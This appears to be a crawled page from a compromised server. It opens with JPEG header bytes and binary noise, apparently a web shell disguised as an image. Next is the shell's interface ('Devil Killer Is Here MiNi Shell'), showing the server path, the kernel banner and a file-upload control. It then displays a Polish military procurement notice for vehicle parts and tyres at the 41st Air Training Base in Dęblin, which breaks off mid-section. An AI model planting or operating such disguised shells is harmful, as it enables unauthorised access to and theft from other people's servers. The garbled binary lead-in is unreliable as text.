JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241018/0055281701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa części zamiennych, filtrów, opon, dętek, ochraniaczy dętek oraz środków chemicznych do wojskowych pojazdów mechanicznych na rzecz 41. Bazy Lotnictwa Szkolnego w Dęblinie” Nr 54/24/P </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">41. Baza Lotnictwa Szkolnego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 061456920</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Brygady Pościgowej 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dęblin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">08-521</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261518173</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">41blsz.przetargi@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.41blsz.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa części zamiennych, filtrów, opon, dętek, ochraniaczy dętek oraz środków chemicznych do wojskowych pojazdów mechanicznych na rzecz 41. Bazy Lotnictwa Szkolnego w Dęblinie” Nr 54/24/P </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7076b6ef-f138-4207-9a10-01be2b28edf8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00552817</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00060530/14/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.20 CZĘŚCI DO POJAZDÓW</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/41blsz/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w języku polskim przy użyciu środków komunikacji<br/>elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002r o świadczeniu usług drogą elektroniczną (tj. Dz. U. z 2020r, poz. 344) za<br/>pośrednictwem Platformy Zakupowej pod adresem: https://www.platformazakupowa.pl<br/>amawiający nie przewiduje komunikowania się z wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej<br/>(nie mają tu zastosowania okoliczności określone w art. 65 ust. 1, art. 66 i art. 69 ustawy Pzp).<br/>Postępowanie prowadzone jest w języku polskim przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18<br/>lipca 2002r o świadczeniu usług drogą elektroniczną za pośrednictwem Platformy Zakupowej platformazakupowa.pl funkcjonującej<br/>pod adresem: https://platformazakupowa.pl/pn/41blsz</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Sposób sporządzenia dokumentów<br/>elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020r w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia<br/>23 grudnia 2020r w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415) (szczegóły określono w rozdziale VII SWZ).<br/>Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) - określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>c) zainstalowana dowolna inna przeglądarka internetowa niż Internet Explorer;<br/>d) włączona obsługa JavaScript;<br/>e) zainstalowany program Adobe Acrobat Reader, lub inny obsługujący format plików .pdf.;<br/>f) szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.;<br/>g) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod<br/>linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem.<br/>18. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>19. Formaty plików wykorzystywanych przez wykonawców powinny być zgodne<br/>z “OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 9 listopada 2017 r. w sprawie ogłoszenia jednolitego tekstu<br/>rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i<br/>wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”<br/>Wśród formatów powszechnych, a NIE występujących w rozporządzeniu tj.: .rar .gif .bmp .numbers .pages. Dokumenty złożone w<br/>takich plikach zostaną uznane za złożone nieskutecznie.<br/>20. Zamawiający zaleca następujący format przesyłanych danych: .pdf, .doc, docx., .xls, .xlsx .jpg (.jpeg) ze szczególnym<br/>wskazaniem na .pdf oraz w celu ewentualnej kompresji danych, formaty .zip,.7Z.<br/>21. Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz<br/>na ograniczenie wielkości plików<br/>podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">6.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia 2016/679, zamawiający informuje, że: administratorem Pani/Pana danych osobowych jest: <br/>41. Baza Lotnictwa Szkolnego w Dęblinie <br/>ul. Brygady Pościgowej 5 <br/>08 – 521 Dęblin, <br/>NIP: 506-011-18-75, REGON: 061456920, <br/>kontakt: tel. 261 517 525, e-mail: 41blsz.przetargi@ron.mil.pl <br/>a)	kontakt do Inspektora ochrony danych osobowych Zamawiającego: tel. 261 518 821, e-mail: 41blsz.iod@ron.mil.pl ; <br/>b) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO <br/>„Dostawa części zamiennych, filtrów, opon, dętek, ochraniaczy dętek oraz środków chemicznych do wojskowych pojazdów mechanicznych na rzecz 41. Bazy Lotnictwa Szkolnego w Dęblinie” Nr 54/24/P, prowadzonym w trybie podstawowym bez możliwości negocjacji, o wartości szacunkowej zamówienia poniżej progów unijnych w związku z art. 275 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (dalej „Pzp”); <br/>c)	w odniesieniu do danych osobowych osób fizycznych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; <br/>d)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp; Na podstawie art. 74 ust. 3 ustawy Pzp – w przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 rozporządzenia 2016/679, zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia. Skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może naruszać integralności protokołu postępowania oraz jego załączników. <br/>e)	Pani/Pana dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia; a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>f)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>g)	posiada Pani/Pan: <br/>	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących, <br/>	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*, <br/>	skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników <br/>Zgodnie z art. 19 ust. 2 ustawy Pzp skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą <br/>	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO**; <br/>**prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego <br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 w RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego. <br/>	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy osoba fizyczna uzna, że przetwarzanie danych osobowych jej dotyczących narusza przepisy RODO, <br/>h)	nie przysługuje Pani/Panu: <br/>	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych, <br/>	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, <br/>	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">54/24/P</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">9</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 1 dostawa filtrów do pojazdów wojskowych- <br/>Służba czołgowo-samochodowa<br/><br/><br/>1)	Przedmiotem zamówienia jest dostawa filtrów zawartych w Formularzu ofertowym załącznik nr 1 do SWZ w ilościach określonych przez Zamawiającego. <br/>2)	Dostarczony przedmiot zamówienia, powinien być fabrycznie nowy, kategorii I (pierwszej), wolny od wad fizycznych i prawnych odpowiadający swemu przeznaczeniu oraz zgodny z parametrami określonymi przez producentów pojazdów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34300000-0 - Części i akcesoria do pojazdów i silników do nich</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dotyczy wszystkich zadań<br/>2.	Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryteriami i ich znaczeniem (wagą):<br/><br/><br/>X - cena brutto oferty – waga 100%<br/><br/>X = (Cn : Cb) x 100 x 100% ( ilość punktów )<br/><br/>Gdzie:<br/><br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty”<br/>Cn– najniższa cena brutto spośród ocenianych ofert w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 10 Formularza ofertowego<br/>Cb – cena brutto oferty ocenianej w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 10 Formularza ofertowego .<br/><br/>Przez „cenę brutto oferty” zamawiający rozumie wartość ogółem brutto - z formularza ofertowego stanowiącego załącznik Nr 1 do SWZ tabela Formularza kolumna 10 w zakresie poszczególnych zadań.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 2 dostawa opon, dętek, ochraniaczy dętek do pojazdów wojskowych- Służba czołgowo- samochodowa<br/><br/><br/><br/>1)	Przedmiotem zamówienia jest dostawa opon, dętek, ochraniaczy dętek zawartych w Formularzu ofertowym załącznik nr 1 do SWZ (w ilościach określonych przez Zamawiającego. <br/>2)	Zamawiający wymaga aby przedmiot zamówienia był objęty gwarancją wystawioną przez wykonawcę na okres minimum 24 miesięcy od daty odbioru dostawy. <br/>3)	Opony musza odpowiadać swemu przeznaczeniu oraz zapewniać funkcjonowanie wojskowych pojazdów mechanicznych zgodnie z parametrami określonymi w treść formularza ofertowego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34351100-3 - Opony do pojazdów silnikowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dotyczy wszystkich zadań<br/>2.	Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryteriami i ich znaczeniem (wagą):<br/><br/><br/>X - cena brutto oferty – waga 100%<br/><br/>X = (Cn : Cb) x 100 x 100% ( ilość punktów )<br/><br/>Gdzie:<br/><br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty”<br/>Cn– najniższa cena brutto spośród ocenianych ofert w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 10 Formularza ofertowego<br/>Cb – cena brutto oferty ocenianej w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 10 Formularza ofertowego .<br/><br/>Przez „cenę brutto oferty” zamawiający rozumie wartość ogółem brutto - z formularza ofertowego stanowiącego załącznik Nr 1 do SWZ tabela Formularza kolumna 10 w zakresie poszczególnych zadań.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 3 dostawa części zamiennych do pojazdów wojskowych marki Fiat Ducato, Ford Transit, Opel Insygnia, VW Transporter, Toyota Camry- <br/>Służba czołgowo- samochodowa<br/><br/><br/><br/>1)	Przedmiotem zamówienia jest dostawa części zamiennych zawartych w Formularzu ofertowym załącznik nr 1 do SWZ oraz w Załączniku nr 1a do SWZ (opis przedmiotu zamówienia- wykaz przedmiotu zamówienia) w ilościach określonych przez Zamawiającego. <br/>2)	Dostarczony przedmiot zamówienia, powinien być fabrycznie nowy, kategorii I (pierwszej), wolny od wad fizycznych i prawnych odpowiadający swemu przeznaczeniu oraz zgodny z parametrami określonymi przez producentów pojazdów. <br/>3)	Zamawiający wymaga aby przedmiot zamówienia był objęty gwarancją wystawioną przez wykonawcę na okres minimum 12 miesięcy od daty odbioru dostawy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34300000-0 - Części i akcesoria do pojazdów i silników do nich</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) 